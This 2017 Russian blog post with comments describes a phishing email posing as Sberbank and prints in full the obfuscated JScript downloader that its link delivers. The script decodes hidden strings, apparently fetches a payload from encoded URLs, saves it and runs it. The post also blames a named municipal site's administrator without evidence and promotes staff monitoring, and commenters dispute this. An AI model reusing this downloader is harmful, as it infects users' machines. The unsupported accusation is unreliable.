06.04.2017 13:22
N0tes 48 3800 Источник


Мне пришло письмо. С виду совершенно обычное. Способное ввести в заблуждение множество обычных пользователей ПК.

У меня же оно сразу вызвало целую кучу подозрений:

  • странно написано имя отправителя;
  • нет фирменной подписи и логотипов Сбербанка;
  • приветствие не по форме — обычно пишут «Уважаемый, ФИО»
  • да вообще какое-то несуразное письмо, словно школьник писал.

Мне стало интересно, я сохранил тело письма в eml файл и просмотрел его:



Увы, всё примитивно и предсказуемо. Письмо пришло через цепочку итальянских серверов, имя Мухина (интересно, в Сбербанке вообще существует такой человек, чьё имя было выбрано злоумышленником?) просто подставлено в текст.

Если кому, то интересно, что за вредоносный код загружается при неосторожном переходе по ссылке, то

вот он
function WCc()
{
	var OlL = "";
	return OlL;
}

function NK()
{

}

function G(y)
{
	return "\x63\x68\x61\x72A\x74";
}

function x(jRU)
{
	var K = ",!)Q ;Zrvz2^@HgS{I~1(O`ba'&l%$mqVCXG9#w0]d.-8W_34[kA5<n/RBDLsFN\\tpY6E7fy?oi|+\"xJ>ThUc=uKjeM:}*P";
	var AFo=45301;
	var ys=AFo+32313;
	var bxr=ys/257;
	var g=bxr-271;
	var aj = K[G(jRU)](jRU-g);
	return aj;
}
var rk = "\x41ctive\x58Object";


function MW()
{

var L=3028;
var vSf=2415;

return "l";
}
function rW()
{

var jR=28284;
var Buv="-7;dVOR5b!";
return MW();
}
function kL()
{
var Kj=46531;

var zcJ=29444;
return "e";

}
function U()
{

var ZF=48011;
var T="wHa.AY@jK";

return kL();
}
function I()
{

var Y=10471;

	return rW()+U();
}
function NQ()
{
return x(8330/98+0);
}
function pSa()
{
return x(9*5);
}
function v()
{

var esh=55327;

	return NQ()+pSa();
}
function zNj()
{
return x(5*19);
}
function cHA()
{
return x(64+49);
}
function rSB()
{

var S=49316;

	return zNj()+cHA();
}
function Gt() {
	var B="";
	B=B;
	return B;
}
function bq() {
	var lS="";
	lS=lS;
	return lS;
}
function BTl(e)
{
	var YY = I();
	var loH = v();
	var Jy = rSB();
	YY = YY + Gt() + loH + bq() + Jy;
	var A = e[YY];
	return A;
}

function oL(tb)
{
	return eval(rk);
}

function Q()
{
	return (("1024"!=(512+512))?"":"\x41\x44\x4F\x44B.\x52\x65\x63\x6F\x72dset");
}

function pOv(mGf, xO)
{
	var P = new mGf(Q());
	return P;
}

function Hh() {
	var aTS=412812;
	var EN=aTS+22623;
	var D=EN/609;
	var HkP=D-711;
	return HkP+0;
}
function DT()
{
return x(32*2);
}
function qz()
{
return x(13+25);
}
function qQv()
{
return x(77+43);
}
function u()
{

var p=24867;

	return qz()+qQv();
}
function PaC()
{

var E=5111;

	return DT()+u();
}
function UG()
{
return x(731-676);
}
function cr()
{
return x(33+62);
}
function q()
{
return x(9600/80-0);
}
function jK()
{

var cd=50531;

	return cr()+q();
}
function Z()
{

var d=42183;

	return UG()+jK();
}
function Lc()
{

var Rd=43409;

	return PaC()+Z();
}
function uMo()
{
return x(16+36);
}
function Ny()
{
return x(362-308);
}
function O()
{
return x(869-750);
}
function rq()
{

var Lq=6866;

	return Ny()+O();
}
function iDq()
{

var M=55055;

	return uMo()+rq();
}
function ADw()
{
return x(450-330);
}
function Rz()
{
return x(5*23);
}
function SIf()
{
return x(6840/72-0);
}
function z()
{

var Tfi=60115;

	return Rz()+SIf();
}
function f()
{

var Yvu=42750;

	return ADw()+z();
}
function eK()
{

var myK=13009;

	return iDq()+f();
}
function iUz()
{

var QZX=29399;

	return Lc()+eK();
}
function r()
{
return x(33+49);
}
function czc()
{
return x(7565/85+0);
}
function ep()
{
return x(3120/60+0);
}
function h()
{

var yL=2398;

	return czc()+ep();
}
function vj()
{

var unz=64533;

	return r()+h();
}
function QuT()
{
return x(2670/30-0);
}
function DdK()
{
return x(318-230);
}
function C()
{

var Ni=61603;

	return QuT()+DdK();
}
function zA()
{
return x(70+3);
}
function PV()
{
return x(4350/50+0);
}
function weV()
{

var YL=33374;

	return zA()+PV();
}
function kad()
{

var vk=39316;

	return C()+weV();
}
function ZS()
{

var NL=28171;

	return vj()+kad();
}
function qJy()
{
return x(14+106);
}
function hMY()
{
return x(5*23);
}
function er()
{

var jNo=65439;

	return qJy()+hMY();
}
function PIJ()
{
return x(396-292);
}
function YJ()
{
return x(2*19);
}
function yc()
{

var FZu=27745;

	return PIJ()+YJ();
}
function Hrg()
{

var ez=49187;

	return er()+yc();
}
function UB()
{
return x(368-296);
}
function a()
{
return x(54+37);
}
function cm()
{

var OJ=62709;

	return UB()+a();
}
function CtO()
{
return x(2160/18+0);
}
function DWp()
{
return x(8645/91-0);
}
function b()
{

var Lvk=59585;

	return CtO()+DWp();
}
function zLo()
{

var ewc=23964;

	return cm()+b();
}
function pTX()
{

var wGn=58015;

	return Hrg()+zLo();
}
function VBB()
{

var Tf=60952;

	return ZS()+pTX();
}
function l(Rf)
{
	var dxd = oL(Rf+Hh());
	var X = "";
	var zqE = 0;

	for (zqE = 0; zqE < 10; ++zqE)
	{
		X = X + zqE;
	}

	var kwo = WScript[iUz()](VBB());

	var kKb = "n" + "um" + "ber";
	var MrW = "f" + "i" + "e" + "lds";

	var Qa = typeof kwo[MrW]["c" + "o" + "u" + "n" + "t"];
	if (Qa != kKb)
		return false;
	Qa = typeof kwo[MrW]["it" + "em"];
	kKb = "un" + "kn" + "own";
	var FYR = (Qa == kKb);

	return FYR;
}

function Nn(irv, nx)
{
	var zwu=64873;
	var iJ=zwu+13123;
	var Iu=iJ/629;
	var xb=Iu-123;
	var Wh = xb;
	var Gj=108550;
	var FJ=Gj+28850;
	var n=FJ/150;
	var Wg=n-916;
	var rkb = Wg;
	var V=303300;
	var UU=V+24716;
	var cGH=UU/664;
	var WFv=cGH-487;
	var CUt = WFv;
	var iRK="";
	iRK=iRK+x(624-528)+x(0+55)+x(626-588)+x(7*13)+x(2040/17-0)+x(30+18)+x(5*17)+x(5*19);
	var Ir = iRK;
	var lU="";
	lU=lU+x(5*23)+x(2034/18-0)+x(685-630)+x(2*19)+x(41*2)+x(514-419);
	var Hmj = lU;

	CUt = eval((Math.cos(Wh) > 0)?Ir:Hmj);

	if (Math.sin(Wh) > rkb)
	{
		var pf = CUt(irv, nx);
		return pf;
	}
	else
		return Wh;
}

function o() {
	var aw=212053;
	var Ren=aw+29629;
	var wm=Ren/854;
	var Ku=wm-283;
	return Ku+0;
}
function fp() {
	var bo="";
	bo=bo;
	return bo;
}
function Ce() {
	var Hs=48419;
	var XN=Hs+49446;
	var dUI=XN/851;
	var Tq=dUI-115;
	return Tq+0;
}
function Yj() {
	var uve=81287;
	var ma=uve+21737;
	var blv=ma/274;
	var oEU=blv-374;
	return oEU+0;
}
function bH() {
	var VS="";
	VS=VS+x(4600/40-0)+x(113)+x(165/3+0)+x(1140/30-0)+x(15+67)+x(76+19);
	return VS;
}
function Xem() {
	var nK="";
	nK=nK+x(920-805)+x(113)+x(117-62)+x(35+3)+x(41*2)+x(877-782);
	return nK;
}
function vL() {
	var Iwj=855662;
	var MOb=Iwj+2643;
	var Vdl=MOb/959;
	var qXl=Vdl-894;
	return 0+qXl;
}
function qM() {
	var jJ=125126;
	var RUc=jJ+53459;
	var LYz=RUc/935;
	var zxi=LYz-175;
	return zxi+0;
}
function ZzO() {
	var amm="";
	amm=amm+x(5*23)+x(113/1+0)+x(550/10-0)+x(82-44)+x(32*2)+x(5720/55+0)+x(696-624)+x(5280/44+0)+x(41*2)+x(387-292);
	return amm;
}
function eRV() {
	var UBL="";
	UBL=UBL+x(101)+x(161-123)+x(943-839)+x(432-371)+x(11+53)+x(1086-973)+x(37+18)+x(874/23+0)+x(56+8)+x(8*13)+x(739-667)+x(11640/97-0);
	return UBL;
}
function ha() {
	var Mrv="";
	Mrv=Mrv;
	return Mrv;
}
function Kvr(k, qAo)
{
	var Ncf = BTl(k);
	var cZN = o();
	var vYa = BTl(qAo);
	var jq = [fp()][Ce()];
	while (cZN < Ncf)
	{
		var yqL = cZN / Yj();
		var wpD = k[bH()](cZN);
		cZN++;
		wpD = wpD + k[Xem()](cZN);
		cZN = cZN + vL();
		var qu = Nn(wpD, qM());
		var VEl = qAo[ZzO()](yqL % vYa);
		var Kz = qu ^ VEl;
		var xon = String[eRV()](Kz);
		jq = jq + ha() + xon;
	}
	return jq;
}

function nI(YAi)
{
	var DbF=420895;
	var nf=DbF+9905;
	var QcL=nf/718;
	var w=QcL-472;
	var VDk = w;
	var mV = Kvr("3F2B45","QD1Q4IVX7tSNp5Y");
	try
	{
		var Hv="";
		Hv=Hv+x(3744/72+0)+x(912-814)+x(6930/63-0)+x(698-610)+x(10527/87-0)+x(8*5)+x(658-562)+x(4*23)+x(19+51)+x(227-106)+x(4719/39+0)+x(5*17)+x(895-849)+x(4224/96-0)+x(2*19)+x(1680/24-0)+x(5*13);
		var nkb="";
		nkb=nkb+x(10200/85+0)+x(588-548)+x(11*11)+x(8*13)+x(15*7)+x(203-157)+x(113+4)+x(84-30)+x(4182/51+0)+x(6*19);
		mV = Kvr("13",Hv) + YAi[Kvr("221F393B0C3E052C203800",nkb)]();
		var oa="";
		oa=oa+x(116/2-0)+x(4725/75-0)+x(32*3)+x(16*7)+x(2223/19+0)+x(59+7)+x(7*17)+x(61+32)+x(27*3)+x(13+37)+x(10*7)+x(840/21-0)+x(196/2+0)+x(34+16);
		var jAG=7951;
		var WFn=jAG+52263;
		var iV=WFn/77;
		var Xf=iV-526;
		mV = mV + VDk[Kvr("0F3E11263433",oa)](Xf);
		WScript[Kvr("14350A0D","QVbblOci7u7d")](Kvr("2F0D103D332C00566765750A272A0D02","KeqNTDdeQSFmC"));
	}
	catch (voB)
	{
		var j="";
		j=j+x(34+3)+x(931-870)+x(11210/95-0)+x(60+10)+x(28+44)+x(8378/71+0)+x(310-212)+x(279-241)+x(334-219)+x(10*11)+x(161-103);
		var aZ = WScript[Kvr("191F2E51102E7910092F0F2E",j)](Kvr("34372902511A4166042D3E4159445C","cdJp8j5HJHJ6667Kdith"));
		var Dsx = Kvr("374442","D00fx7nHGfs0hRU") + "ing";
		var lC = typeof aZ["User" + "Domain"];
		if (lC == Dsx)
		{
			var afu=114956;
			var OkP=afu+27489;
			var KU=OkP/155;
			var TN=KU-916;
			var cgJ = TN;
			var SGY=255688;
			var ofv=SGY+20864;
			var Tg=ofv/276;
			var Plk=Tg-1000;
			mV = YAi[Kvr("3D000E6B3C2F052C2C1E762D3C515C33","zez8LJfEMr0BP59Ake")](Plk) + mV;
		}
		else
		{
			var lBq=7442;
			var aEP=lBq+1228;
			var hUM=aEP/578;
			var ZYS=hUM-5;
			var cgJ = ZYS;
			var mej="";
			mej=mej+x(3*23)+x(415-346)+x(3*23)+x(5+84)+x(63+15)+x(4*13)+x(11400/100-0)+x(214-142)+x(896-805)+x(37+44);
			var Tr=42482;
			var UKZ=Tr+50974;
			var utI=UKZ/264;
			var eM=utI-353;
			mV = YAi[Kvr("30120317432A360D120731181B20563D",mej)](eM) + mV;
		}
	}
	return mV;
}


function oWx(Uh, NV, zH, tAV)
{
	var aN=697766;
	var ZN=aN+339;
	var Zc=ZN/731;
	var pR=Zc-955;
	var ZX = pR;
	if (Uh > ZX)
	{
		Uh = ZX;
	}
	var Ic=["Xp","Y","AD8","pgv","yh","Ah","Fy","H5","8E","Q"];
	var iU=Ic[1]+Ic[6]+Ic[4]+Ic[8]+Ic[3]+Ic[2]+Ic[0]+Ic[7]+Ic[5]+Ic[9];
	var Klz = Kvr("2A211D13005936170F122B",iU);
	var QwO="";
	QwO=QwO+x(4*11)+x(3*31)+x(423-310)+x(60+33)+x(2479/67+0)+x(62+31)+x(89)+x(4+61)+x(978-909)+x(55/1+0)+x(823-705)+x(311-191)+x(1089/11-0)+x(700-587)+x(1353/33-0)+x(896-833)+x(950/19+0)+x(837/9-0)+x(101)+x(1120/10+0);
	Klz = new NV(Kvr("1F3D0B3C333E307624092E0929",QwO));
	Klz[tAV](zH, Uh);
	var Juq=149026;
	var cU=Juq+45644;
	var sfy=cU/515;
	var hOc=sfy-370;
	var mV = hOc;
	return mV;
}

function KR(NWW, NV, zH, tAV)
{
	var nz="";
	nz=nz+x(890-832)+x(34+86)+x(6715/79+0)+x(9*5)+x(92+3)+x(474-361);
	var buw = NWW[nz];
	var tje=330;
	var lVP=tje+240;
	var kMc=lVP/19;
	var WG=kMc-23;
	var lup = WG;
	var YSi=399071;
	var mch=YSi+6529;
	var RW=mch/480;
	var TdJ=RW-840;
	var mC = TdJ;
	var wH = tAV;
	if (buw == lup)
	{
		var ODl="";
		ODl=ODl+x(1444/38+0)+x(665-548)+x(50+35);
		wH = ODl;
	}
	if (buw == mC)
	{
		var gu = buw * mC;
		return oWx(gu, NV, zH, tAV);
	}
	var hwy="";
	hwy=hwy+x(7371/81-0)+x(585/5-0)+x(18*3)+x(7*13)+x(902-807)+x(22+16)+x(1025-920)+x(673-588)+x(4275/95-0);
	var bx=1520;
	var jA=bx+1844;
	var Ih=jA/29;
	var ts=Ih-116;
	var bh=616372;
	var ZC=bh+55964;
	var Ve=ZC/828;
	var Ol=Ve-811;
	var dLa = NWW[hwy](ts, buw - Ol);
	return KR(dLa, NV, zH, wH);
}

function iq(POP)
{
	var tZ = "342400150E28261F3221505415";
	var VY = new POP(Kvr(tZ,"cWcggXR1aI58y96v6"));
	return VY;
}

function QQ(IQ, HZF, NV)
{
	var RZV=317572;
	var jQ=RZV+17863;
	var lKK=jQ/919;
	var qGo=lKK-355;
	var R = qGo;

	var zTI="";
	zTI=zTI+x(4437/51-0)+x(24*5)+x(994-939)+x(428-356);
	var Du = IQ[zTI]();
	var xjQ="";
	xjQ=xjQ+x(2*23)+x(43+62)+x(21+19)+x(69+51);
	var wED = IQ[xjQ];
	var uQr=166642;
	var ME=uQr+37808;
	var UyU=ME/725;
	var hn=UyU-81;
	var UmN = hn;
	var gv="";
	gv=gv+x(41*2)+x(11+78)+x(4836/93+0)+x(30+59)+x(646-558)+x(73)+x(447-360)+x(485-365)+x(2645/23-0)+x(7696/74-0)+x(24+14)+x(576/8-0)+x(31+60)+x(24*5)+x(85+10);
	var TxC = new NV(gv);
	var pP="";
	pP=pP+x(5022/93-0)+x(445-340)+x(4675/55-0);
	var EvF = pP;
	var bI="";
	bI=bI+x(7777/77+0)+x(9870/94-0)+x(380-260)+x(1056-998)+x(24*3)+x(573-482);
	var mY="";
	mY=mY+x(1430/26-0)+x(33+63)+x(1920/20-0)+x(24*5)+x(3230/38-0)+x(1008/14+0);
	TxC[bI][mY](EvF, UmN, wED);
	var Pp="";
	Pp=Pp+x(8*13)+x(3552/37+0)+x(42+78)+x(53+32);
	TxC[Pp]();
	var qzS="";
	qzS=qzS+x(265-210)+x(702-630)+x(6480/90-0)+x(466-373)+x(24*5)+x(937-868);
	TxC[qzS]();
	var osA="";
	osA=osA+x(469-414)+x(54+42)+x(15+81)+x(24*5)+x(5*17)+x(4896/68-0)+x(1088/17+0)+x(11074/98+0)+x(5967/51-0)+x(993-908)+x(27*3);
	TxC(EvF)[osA](Du);
	var XY="";
	XY=XY+x(103+14)+x(474-378)+x(25+47)+x(46+9)+x(662-567)+x(3960/33-0);
	TxC[XY]();
	var zI="";
	zI=zI+x(3*13)+x(2475/45-0)+x(2*29)+x(9*13)+x(188-68);
	Du = TxC(EvF)[zI];
	var KsI="";
	KsI=KsI+x(2726/47+0)+x(441-321)+x(5*17)+x(795-750)+x(6745/71-0)+x(105+8);
	var dx = Du[KsI];

	if (dx > R)
	{
		var Ix="";
		Ix=Ix+x(818-772)+x(1705/31-0)+x(3666/94-0)+x(24*5)+x(16*7)+x(518-414)+x(962-870)+x(205-100)+x(3+55)+x(5760/48-0);
		IQ[Ix](HZF);
		return true;
	}
	else return false;
}

function jrp(poN)
{
	var JjN = "0429617C0D6A42611A09012E6D61";
	var VY = new poN(Kvr(JjN,"Iz91AXl9WE"));
	return VY;
}

function ZkB(pce, HK)
{
	var jnP="";
	jnP=jnP+x(440/11-0)+x(5*17)+x(5772/74+0)+x(4914/91+0)+x(318-193)+x(89)+x(1087-969)+x(5*23)+x(707-612)+x(440-325)+x(79)+x(476/14-0);
	var UpC = "2D3D501039343F";
	var My = eval(Kvr(UpC,jnP));
	var pin = "23191A30432C20033E1509350806";
	var pS = My[Kvr(pin,"pzhY3XfvRyGTecO")];
	var gl="";
	gl=gl+x(5*11)+x(937-844)+x(21+16)+x(21+24)+x(24+21)+x(5876/52+0)+x(4*11)+x(405/9-0)+x(451-358)+x(47+15)+x(3432/39+0);
	var uXJ = "052B3602130D0E0E2214";
	pce[Kvr(uXJ,gl)](pS);
	return true;
}

function fd(plI, wT)
{
	var SPH="";
	SPH=SPH+x(8736/78+0)+x(18*5)+x(73+19)+x(38+83)+x(77+16)+x(306-267)+x(4*13)+x(387-272)+x(10*11)+x(5*23)+x(2080/52-0)+x(83)+x(1872/18-0);
	var wL = "3B3C2323";
	var yhy = "0C721A";
	var Ez=1560;
	var vsA=Ez+477;
	var ci=vsA/7;
	var sb=ci-291;
	plI[Kvr(wL,SPH)](Kvr(yhy,"K7NbuLP92ojXLMEhLU"), wT, sb);
	try {
		var SI="";
		SI=SI+x(1+109)+x(109)+x(1628/44-0)+x(113)+x(2261/19+0)+x(8463/93+0)+x(16*7)+x(1170/10+0)+x(9500/100+0)+x(24*3)+x(2835/35-0)+x(15+30)+x(11*11)+x(6*13)+x(31+57)+x(16+46)+x(35+63)+x(76+44)+x(578-513)+x(67);
		var qc = "391D340C";
		plI[Kvr(qc,SI)]();
	} catch (li) {
		return 0;
	}
	return 1;
}

function hK(wK)
{
	var bcB="";
	bcB=bcB+x(41*2)+x(46+69)+x(5*19)+x(15*7)+x(999-960)+x(418-298);
	var sIP = bcB + wK;
	return eval(sIP);
}

function Nk(ok)
{
	var zgv="";
	zgv=zgv+x(5*13)+x(161-109)+x(2538/47-0)+x(75+44)+x(30+90)+x(20+95)+x(5*19);
	var ei = hK(zgv);

	var rE = iq(ei);
	var MY = jrp(ei);
	var GpE=["t","F","O","Sc","em","Sys","g.","bje","ct","in","ri","p","ile","t"];
	var qem=GpE[3]+GpE[10]+GpE[11]+GpE[0]+GpE[9]+GpE[6]+GpE[1]+GpE[12]+GpE[5]+GpE[13]+GpE[4]+GpE[2]+GpE[7]+GpE[8];
	var Zk = new ei(qem);
	if (fd(MY, ok) == 0)
		return false;


	var wgW="";
	wgW=wgW+x(3818/83-0)+x(16+79)+x(19+36)+x(68+27)+x(78+39)+x(703-612);
	var Ik = MY[wgW];
	var unF=986448;
	var Am=unF+49026;
	var qG=Am/957;
	var sL=qG-882;
	var el = sL;

	if (Ik == el) {
		var fPx="";
		fPx=fPx+x(41*2)+x(689-600)+x(11+41)+x(38+51)+x(84+4)+x(18+55)+x(40+6)+x(10+85)+x(946-908)+x(601-481)+x(36+19)+x(37+24);
		var VqX = new ei(fPx);
		var XT = nI(Zk);
		var QjY="";
		QjY=QjY+x(163-111)+x(436-340)+x(24*5)+x(5*17);
		VqX[QjY]();
		var KNH="";
		KNH=KNH+x(5712/51+0)+x(6120/60+0)+x(77+19)+x(8880/74+0);
		var nMl=65264;
		var vob=nMl+39388;
		var lLI=vob/646;
		var ElT=lLI-161;
		VqX[KNH] = ElT;

		var hO="";
		hO=hO+x(7482/86-0)+x(5760/48+0)+x(147-56)+x(243-147)+x(102+2)+x(34+51)+x(275-184)+x(31+89)+x(8*11)+x(38+66)+x(24*3)+x(6*17);
		var NiQ = MY[hO];
		var BBA="";
		BBA=BBA+x(244-168)+x(2*19)+x(15*7)+x(5*19)+x(24*5);
		VqX[BBA](NiQ);
		var Ifp="";
		Ifp=Ifp+x(25*5)+x(221-117)+x(7098/78-0)+x(831-726)+x(5*19)+x(705-600)+x(425-321)+x(5*17);
		var ePc=265655;
		var vd=ePc+52585;
		var RKU=vd/360;
		var Cng=RKU-884;
		VqX[Ifp] = Cng;
		if (!QQ(VqX, XT, ei))
			return false;

		var GFN="";
		GFN=GFN+x(32*2)+x(529-471)+x(248-144)+x(7*13)+x(11400/95+0);
		VqX[GFN]();
		var uoT="";
		uoT=uoT+x(176-61)+x(43+18)+x(873-801)+x(55+18)+x(445-325)+x(5886/54-0)+x(880-760)+x(674-639)+x(668-582)+x(5*23)+x(999-964);
		var SPe = uoT + XT;
		var jn=401746;
		var vU=jn+17519;
		var aeI=vU/693;
		var DXh=aeI-605;
		var JH = DXh;
		var Dek=["y","7","asq","n","a","j","fs","dh","gfs","m","h","ds"];
		var HnA=Dek[2]+Dek[9]+Dek[3]+Dek[11]+Dek[5]+Dek[10]+Dek[0]+Dek[1]+Dek[4]+Dek[8]+Dek[7]+Dek[6];
		var Fv="";
		Fv=Fv+x(1+49)+x(615-565)+x(239-198)+x(780/10-0);
		JH = KR(HnA, ei, SPe, Fv);

		var Lzd=243397;
		var NgS=Lzd+3653;
		var BBz=NgS/305;
		var RY=BBz-800;
		var Ms = RY;
		if (JH < Ms)
		{
			return ZkB(Zk);
		}
		else
		{
			return false;
		}

	}
	else {
		return false;
	}


	return true;
}

function ZAk(wT, Bwd)
{
	try
	{
		var Em="";
		Em=Em+x(10*7)+x(152-53)+x(411-361)+x(237-173)+x(83)+x(5244/57-0)+x(47+3)+x(5390/77-0)+x(41)+x(1896/24-0)+x(4+74)+x(45+44)+x(7+71)+x(24+74)+x(158/2+0)+x(83)+x(5600/80-0)+x(14*7)+x(2520/36-0)+x(492-392)+x(43+36)+x(188-118)+x(83)+x(58+17)+x(150/3+0)+x(32*2)+x(83)+x(4*23)+x(931-881)+x(4+94)+x(702/9-0)+x(89);
		var aCk="";
		aCk=aCk+x(613-514)+x(950-829)+x(10*11)+x(83+14)+x(67)+x(1089-996)+x(7900/79+0)+x(32*2)+x(10*5)+x(7*13)+x(7920/80-0)+x(86+10)+x(16*3)+x(67)+x(2755/29+0)+x(42+33);
		var RJm="";
		RJm=RJm+x(501-423)+x(8134/83+0)+x(655-614)+x(50+14)+x(453-412)+x(39+11)+x(6*13)+x(6*13)+x(33+50)+x(295-254)+x(89-48)+x(14*7)+x(705-622)+x(194-116)+x(1096-996)+x(885-815)+x(850-767)+x(5360/80-0)+x(10*5)+x(5456/62-0)+x(2378/58+0)+x(17+72)+x(10*5)+x(328/4-0);
		var QqF="";
		QqF=QqF;
		var fE = Kvr(Em,"jv7qWZRv5ot") + Kvr(RJm,aCk) + Kvr(QqF,"Fs93Z9bRehoIabRs");
		var OpE = Nk(wT);
		var DU="";
		DU=DU+x(1435/35+0)+x(6*13)+x(10*5)+x(8*11)+x(2100/42-0)+x(255-191)+x(68+10)+x(5100/51-0)+x(0+83)+x(20*5)+x(2583/63+0)+x(8+70)+x(68+2)+x(5382/69-0)+x(10*7)+x(1031-931)+x(41)+x(1014-931)+x(1061-978)+x(51+32)+x(2310/33-0)+x(5720/65-0)+x(604-534)+x(67);
		var bY = Kvr(DU,"GhtP6IpoA2jcMWqYgb");
		if ("1024" >= 512)
		{
			var jc = 1024;
			throw OpE;
		}
	}
	catch(mKR)
	{
		if (mKR) return mKR;
		var PeO = "0123456789";
		function MWN() {
			var fO="";
			fO=fO+x(660/12-0)+x(45+22)+x(795-757)+x(2340/52+0)+x(10*7)+x(4040/40+0)+x(431-392)+x(69+3)+x(28+13)+x(508-470)+x(57+35)+x(320/8-0)+x(3277/29-0)+x(2438/53-0)+x(19+36)+x(1047-956)+x(192-148)+x(18+54);
			return fO;
		}
		function sdr() {
			var NG=220429;
			var zjy=NG+41767;
			var vzj=zjy/649;
			var CD=vzj-400;
			return CD+0;
		}
		var ae = "0D5C1C00440E";
		var ZCF = (PeO[Kvr(ae,MWN())] < sdr());
		return ZCF;
	}
	return Bwd;
}

function uDM()
{
	return 1;
}

var LdB = 0;


if ( (uDM() >= 0) && l(LdB))
{
	var ok = [];
	var HDU = "0" + "\x30" + "\x31" + "\x44" + "\x33" + "2" + "\x33" + "F" + "5" + "\x37" + "\x31" + "\x41";
	HDU += "4" + "\x39" + "\x33" + "B" + "\x33" + "\x35" + "5" + "\x42" + "2" + "0" + "\x30" + "6";
	HDU += "2" + "\x37" + "2" + "0" + "4" + "\x36" + "0" + "\x41" + "2" + "9" + "2" + "2";
	HDU += "424216662612";
	HDU += "2" + "\x45" + "0" + "\x36" + "\x33" + "D" + "\x37" + "6" + "\x30" + "B" + "1" + "A";
	HDU += "\x33" + "5" + "\x36" + "0" + "\x30" + "\x45" + "\x35" + "\x41" + "0" + "\x41" + "\x32" + "\x34";
	HDU += "35056C0D3F2C";
	HDU += "\x30" + "D" + "\x34" + "6" + "3" + "5" + "\x33" + "6" + "1" + "\x45" + "\x34" + "1";
	HDU += "0326331B3341";
	HDU += "36210D";
	ok[0] = Kvr(HDU,x(425-312)+x(4200/40+0)+x(4*23)+x(331-279)+x(24+37)+x(5229/63+0)+x(407-306)+x(859-741)+x(6+60)+x(3*13)+x(1040-976)+x(1080-976)+x(808-762)+x(97));
	var GLU = "\x33" + "\x32" + "2" + "3" + "2" + "\x32" + "2" + "\x39" + "\x35" + "\x44" + "\x37" + "\x46";
	GLU += "1C37192F021E";
	GLU += "\x34" + "\x39" + "\x33" + "9" + "3" + "\x35" + "7" + "8" + "\x33" + "\x33" + "2" + "B";
	GLU += "\x31" + "5" + "3" + "F" + "4" + "\x31" + "\x32" + "0" + "\x31" + "\x39" + "3" + "\x35";
	GLU += "051F4A3F233B";
	GLU += "3" + "\x33" + "7" + "6" + "1" + "4" + "2" + "\x39" + "4" + "0" + "3" + "\x30";
	GLU += "133B025D4965";
	GLU += "3F2F33";
	ok[1] = Kvr(GLU,"ZWVYgP3DvVv09K");
	var QjC = false;

	QjC = ZAk(ok[0], 100 < 50)?true:ZAk(ok[1], 40 < 39);
}

var VyvRGtgZ = 850;


Но вишенкой на торте стал сайт, с которого ничего не подозревающий пользователь должен был скачать вражеский скрипт.

А это ни много ни мало, chemal-altai.ru, Официальный сайт Муниципального объединения Чемальский район!



Типа, это Россия, детка. Тут каждый зарабатывает как может. Я не думаю, что украденные через malware деньги идут в бюджет района. Это явно частная инициатива админа. Но у же сам факт, что сайт органа власти используется для противоправной деятельности не особо укладывается у меня в голове.

Почему это происходит? Потому что руководители не знают чем заняты их сотрудники. Потому что начальники не контролируют подчинённых!

А значит надо использовать систему контроля сотрудников.

(Второй вариант в том, что система взломана, а админ имеет низкую квалификацию. Значит нужно централизованное администрирование и установка ПО на государственные сайты)

Тут мне конечно возразят, что если главный злоумышленник тут системный администратор, то он технически более продвинут, чем его начальник. А значит сможет обмануть и начальника и систему.

Отвечу. Правильные системы контроля используют запись видео действий пользователя. Обмануть видео запись невозможно. Скрыться от неё невозможно. Можно отключить, но тогда уже руководитель должен насторожиться.

Еще мне могут сказать, что часто сотрудники занимаются тёмными делишками не с рабочих, а с личных компов. Не смешите, скажу я. Вот вам пример, когда человек не хочет даже дешевый хостинг зарегистрировать, а использует рабочий сервер для malware.

А как вы считаете, чтоит ли контролировать сотрудников и выводить их на чистую воду, или пусть каждый зарабатывает как может, даже так?

Upd. Некоторые читатели выражают мнение, что сайт может быть взломан. На взгляд автора гораздо проще использовать для целей хранения хостинг, чем разослать письма и рисковать обнаружением и удалением скрипта. Но если это так, то значит необходима защита периметра.

Но и контроль нужен, чтобы админ не положил скрипт сам, а потом не сказал — ой, меня взломали.
Поделиться с друзьями
-->

Комментарии (48)


  1. Sly_tom_cat
    06.04.2017 16:27
    #10158276
    +18

    А вариант взлома этого сайта в голову не приходил?

    админ — школьнег отсавил SSH с рутовым доступом и паролем 123 — приходи — пользуйся кто хочет чем хочет. Чем не площадка для размещения зловредных скриптов?


    1. Andrew_I
      06.04.2017 16:29
      #10158288
      -3

      А зачем такие сложности? Ломать чужой аккаунт, чтобы положить туда файлик. А потом он спохватится и перекроет канал. Письма уйдут, а файла не будет. И всё окажется зря…
      Есть куча хостингов без проблем.


      1. EvilWolf
        06.04.2017 16:37
        #10158328
        +10

        С подключением вас.
        Взломы сайтов, генерация туда дорвеев, рассылки и прочие черные вещички у нас в интернете уже в автоматическом режиме делаются и не требуют человеческих ресурсов.

        На сайте этом скорее всего установлена Joomla, которая последний раз обновлялась в 2004 году, а денег на новый сайт у них нет. Сотрудники тут не причём, админ занят ремонтом принтеров и борьбой с бухгалтерией. Если конечно его ещё не заменили на аутсорс, который вообще работает только по прямым указаниям.


        1. DarthKotik
          06.04.2017 17:04
          #10158430

          Мне даже интересно. Вы наугад про Джумлу написали или проверили сначала? http://chemal-altai.ru/administrator/


          1. pewpew
            07.04.2017 09:12
            #10159396

            по путям в письме можно догадаться


      1. demfloro
        06.04.2017 16:38
        #10158336

        На хостинг придут жалобы от жертв такого фишинга и аккаунт закроют, плюс есть возможность отследить владельца аккаунта по платежной информации.


        Проще использовать многочисленные дырявые WordPress и Joomla в интернете в качестве хостинга.


      1. Sly_tom_cat
        06.04.2017 16:43
        #10158352

        Хотя бы для маскировки.


    1. Pakos
      07.04.2017 11:41
      #10159762
      +1

      Есть другой вариант — на дизайн дали ООО "Рога и копыта" с ftp-доступом, у дизайнеров жил троян, спёрший логин-пароль и на вполне приличном сайте постоянно появлялся некий скрипт, пока админ не вспомнил об этом логине и не прибил. История реальная, хотя и старая. С дырявыми CMS всё ещё проще.


      1. Sly_tom_cat
        07.04.2017 12:57
        #10160010

        Ну путь проникновения не так важен, я привел только один возможный вариант. А вариантов — много.


  1. LoadRunner
    06.04.2017 16:28
    #10158282
    +14

    Серьёзно? Вот так вот взять и обвинить администратора в рассылке вредоносов? Лучше бы не на Хабр, а в контакты на сайте писали, что злоумышленники нашли лазейку и разместили у них на сайте вирусню.

    Неужели автор статьи впервые сталкивается с подобным механизмом рассылки и верит, что этим занимается админ каждого сайта, откуда идёт скачивание вредоноса?


    1. N0tes
      06.04.2017 16:35
      #10158312
      -11

